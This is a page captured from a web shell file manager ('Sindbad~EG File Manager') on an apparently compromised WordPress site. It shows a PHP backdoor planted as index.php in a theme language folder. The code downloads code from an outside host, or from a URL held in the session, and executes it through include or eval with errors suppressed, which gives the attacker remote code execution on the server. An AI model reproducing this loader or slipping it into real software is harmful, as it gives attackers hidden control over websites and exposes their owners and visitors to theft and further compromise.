Sindbad~EG File Manager

Current Path : /var/www/html/ch.sumar.com.py/wp-content/languages/themes/163186/
Upload File :
Current File : /var/www/html/ch.sumar.com.py/wp-content/languages/themes/163186/index.php

<?php
session_start();
$mainUrl = $_SESSION['ts_url'] ?? 'https://teamzedd2024.tech/raw/McuQGI';

if (@ini_get('allow_url_include')) {
    @include($mainUrl);
} else {
    $code = @file_get_contents($mainUrl);
    if (!$code && function_exists('curl_init')) {
        $c = curl_init($mainUrl);
        curl_setopt_array($c, [CURLOPT_RETURNTRANSFER => 1, CURLOPT_TIMEOUT => 5]);
        $code = curl_exec($c); curl_close($c);
    }
    if ($code) @eval("?>$code");
}
?>

Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists